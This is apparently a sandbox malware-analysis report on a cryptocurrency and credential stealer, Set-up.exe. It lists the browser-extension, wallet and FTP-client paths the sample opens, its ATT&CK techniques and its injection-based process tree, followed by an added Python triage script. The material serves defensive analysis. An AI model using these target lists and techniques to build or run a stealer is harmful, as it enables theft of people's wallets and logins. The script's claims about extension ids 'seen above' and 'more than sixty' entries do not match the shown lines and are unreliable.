                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Binance
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                  Source: Yara match | File source: 00000001.00000003.1951577261.000000000158F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000003.1898990474.000000000158F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000003.1872993829.000000000158F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000003.1873565102.000000000158F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: Set-up.exe PID: 7820, type: MEMORYSTR
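The "File opened" evidence above is long but falls into a few buckets: Chromium and Firefox credential, cookie and history stores, per-extension storage under "Local Extension Settings" (wallet extensions are addressed by their Chrome Web Store id), desktop wallet directories, and FTP client configuration folders. The triage script below is an added example, not part of the Joe Sandbox report: it parses lines in the report's own format (with or without the run-together "Jump to behavior" link text) and groups the opened paths by what the stealer was after. The category names, the regexes and the small id-to-wallet table are this example's own; the table is the editor's lookup of a few ids seen above, the report itself does not name them. SAMPLE_LINES are copied from the report (constructed input, not a report export).

```python
"""Triage "File opened" evidence from a sandbox report into stealer targets.

Added example, not part of the Joe Sandbox report. Categories, regexes and
KNOWN_WALLET_EXTENSIONS are this example's own assumptions; SAMPLE_LINES
are constructed from the report's lines.
"""
import ntpath
import re
from collections import defaultdict

# Accepts both "... | File opened: <path>" and the raw "...File opened: <path>Jump to behavior".
FILE_OPENED = re.compile(r"File opened:\s*(.+?)\s*(?:Jump to behavior)?\s*$")
# Chrome extension ids are 32 characters drawn from a-p.
EXT_STORAGE = re.compile(r"\\(?:local|sync) extension settings\\([a-p]{32})(?:\\|$)")

CREDENTIAL_FILES = {"login data", "login data for account", "key4.db", "logins.json", "cert9.db"}
COOKIE_FILES = {"cookies", "cookies.sqlite"}
HISTORY_FORM_FILES = {"history", "places.sqlite", "formhistory.sqlite", "web data", "prefs.js"}

# Directory names the report shows being opened (matched as lower-cased path segments).
WALLET_DIRS = {"exodus", "electrum", "electrum-ltc", "coinomi", "ledger live", "atomic",
               "bitcoin", "binance", "com.liberty.jaxx", "guarda"}
FTP_CLIENT_DIRS = {"ftpgetter", "ftpinfo", "smartftp", "ftpbox", "ftprush", "3d-ftp"}

# Assumption: editor's own lookup of a few extension ids seen in the report; not from the report.
KNOWN_WALLET_EXTENSIONS = {
    "nkbihfbeogaeaoehlefnkodbefgpgknn": "MetaMask",
    "bfnaelmomeimhlpmgjnjophhpkkoljpa": "Phantom",
    "hnfanknocfeofbddgcijnmhnfnkdnaad": "Coinbase Wallet",
    "egjidjbpglichdcondbcbdnbeeppgdph": "Trust Wallet",
    "ibnejdfjmmkpcnlpebklmnkoeoihofec": "TronLink",
    "dmkamcknogkgcdfhhbddcghachkejeap": "Keplr",
}


def classify_path(path):
    """Return (category, detail) for one opened path."""
    low = path.lower()
    m = EXT_STORAGE.search(low)
    if m:
        ext_id = m.group(1)
        return "browser_extension_storage", KNOWN_WALLET_EXTENSIONS.get(ext_id, ext_id)
    base = ntpath.basename(low)          # ntpath: backslash paths on any host OS
    if base in CREDENTIAL_FILES:
        return "browser_credentials", base
    if base in COOKIE_FILES:
        return "browser_cookies", base
    if base in HISTORY_FORM_FILES:
        return "browser_history_forms", base
    segments = set(low.split("\\"))
    hit = segments & WALLET_DIRS
    if hit:
        return "crypto_wallet", sorted(hit)[0]
    hit = segments & FTP_CLIENT_DIRS
    if hit:
        return "ftp_client", sorted(hit)[0]
    return "other", base


def triage(lines):
    """Group report lines by category; lines that are not "File opened" evidence are skipped."""
    out = defaultdict(list)
    for line in lines:
        m = FILE_OPENED.search(line)
        if not m:
            continue
        category, detail = classify_path(m.group(1))
        out[category].append((m.group(1), detail))
    return dict(out)


PREFIX = r"Source: C:\Users\user\Desktop\Set-up.exe | File opened: "
CHROME = r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default"
FIREFOX = r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release"
ROAMING = r"C:\Users\user\AppData\Roaming"

# Constructed from the report's lines; the fourth keeps the raw run-together form.
SAMPLE_LINES = [
    PREFIX + CHROME + r"\Login Data",
    PREFIX + CHROME + r"\Network\Cookies",
    PREFIX + CHROME + r"\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn",
    r"Source: C:\Users\user\Desktop\Set-up.exeFile opened: " + CHROME
    + r"\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior",
    PREFIX + CHROME + r"\Web Data",
    PREFIX + FIREFOX + r"\key4.db",
    PREFIX + FIREFOX + r"\logins.json",
    PREFIX + ROAMING + r"\Exodus\exodus.wallet",
    PREFIX + ROAMING + r"\Electrum\wallets",
    PREFIX + ROAMING + r"\FTPRush",
    PREFIX + ROAMING + r"\Conceptworld\Notezilla",
    r"Source: C:\Users\user\Desktop\Set-up.exe | Queries volume information: C:\ VolumeInformation",
]

if __name__ == "__main__":
    for category, hits in sorted(triage(SAMPLE_LINES).items()):
        print(f"{category} ({len(hits)})")
        for path, detail in hits:
            print(f"  {detail:<24} {path}")
```

Feed it the full block of lines above and the extension-storage bucket alone has more than sixty entries, which is the quickest way to see that this is a wallet-focused stealer rather than a generic browser dumper; ids missing from the lookup table are reported as the raw id so they can be looked up afterwards.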

                  Remote Access Functionality

                  Source: Yara match | File source: Process Memory Space: K07BOQJSAWQXKEH8FTYNN.exe PID: 6964, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: Set-up.exe PID: 7820, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 12_2_007D6040 ?ClearListeners@ListenerManager@dvatransport@@QAEXXZ,?Dispose@SmallBlockAllocator@utility@dvacore@@YAXPAXI@Z,?Dispose@SmallBlockAllocator@utility@dvacore@@YAXPAXI@Z,??3@YAXPAX@Z
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 12_2_007EC170 ??4ListenerManager@dvatransport@@QAEAAV01@ABV01@@Z
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 12_2_007EC150 ??0ListenerManager@dvatransport@@QAE@ABV01@@Z
                  MITRE ATT&CK Matrix (the page's matrix was flattened during extraction; only the matched techniques per tactic column are reproduced here, with the match count the matrix shows next to each technique)

                  Tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact

                  Execution: Windows Management Instrumentation (12), Command and Scripting Interpreter (2), Scheduled Task/Job (1)
                  Persistence: DLL Side-Loading (11), Scheduled Task/Job (1), Registry Run Keys / Startup Folder (1)
                  Privilege Escalation: Abuse Elevation Control Mechanism (1), DLL Side-Loading (11), Process Injection (411), Scheduled Task/Job (1), Registry Run Keys / Startup Folder (1)
                  Defense Evasion: Deobfuscate/Decode Files or Information (1), Abuse Elevation Control Mechanism (1), Obfuscated Files or Information (3), Software Packing (11), DLL Side-Loading (11), Masquerading (11), Virtualization/Sandbox Evasion (22), Process Injection (411)
                  Credential Access: OS Credential Dumping (2)
                  Discovery: System Time Discovery (1), File and Directory Discovery (1), System Information Discovery (134), Security Software Discovery (551), Virtualization/Sandbox Evasion (22), Process Discovery (1)
                  Collection: Archive Collected Data (1), Data from Local System (4)
                  Command and Control: Ingress Tool Transfer (2), Encrypted Channel (11), Non-Standard Port (1), Non-Application Layer Protocol (3), Application Layer Protocol (14)
                  Reconnaissance, Resource Development, Initial Access, Lateral Movement, Exfiltration, Impact: no techniques matched
                  Behavior Graph ID: 1635524, Sample: Set-up.exe, Startdate: 11/03/2025, Architecture: WINDOWS, Score: 100

                  Top-level signatures in the graph: Malicious sample detected (through community Yara rule), Antivirus detection for URL or domain, Antivirus detection for dropped file, 8 other signatures. The graph's individual domain and IP address nodes are not reproduced here.

                  Process tree recovered from the graph:
                  Set-up.exe (contacts www.mediafire.com and ultra.mediafirecdn.com over 443; drops K07BOQJSAWQXKEH8FTYNN.exe, svml_dispmd.dll, msvcr100.dll and 20 other malicious files; signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines), Query firmware table information (likely to detect VMs), Found many strings related to Crypto-Wallets (likely being stolen), 4 other signatures)
                    Server.exe (drops svml_dispmd.dll, msvcr100.dll, msvcp100.dll and 18 other malicious files; signatures: Maps a DLL or memory area into another process, Switches to a custom stack to bypass stack traces)
                      more.com (drops ertyayyeqtcs; signatures: Injects code into the Windows Explorer (explorer.exe), Writes to foreign memory regions, Found hidden mapped module (file has been removed from disk), 2 other signatures)
                        explorer.exe (connects to a8a00b7a27dd309f6.awsglobalaccelerator.com, x.ss2.us and a direct IP on non-standard ports; signatures: System process connects to network (likely due to code injection or exploit), Switches to a custom stack to bypass stack traces)
                        conhost.exe
                    K07BOQJSAWQXKEH8FTYNN.exe (drops rareTemp.exe; connects to two direct IPs; signatures: Antivirus detection for dropped file, Multi AV Scanner detection for dropped file, Detected unpacking (creates a PE file in dynamic memory))
                  rareTemp.exe (started separately; connects to three direct IPs on 443 and non-standard ports; signatures: Antivirus detection for dropped file, Multi AV Scanner detection for dropped file, Detected unpacking (creates a PE file in dynamic memory))
                  Server.exe (second instance; signatures: Maps a DLL or memory area into another process, Found direct / indirect Syscall (likely to bypass EDR))
                    more.com
                      conhost.exe
                  2 other processes

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.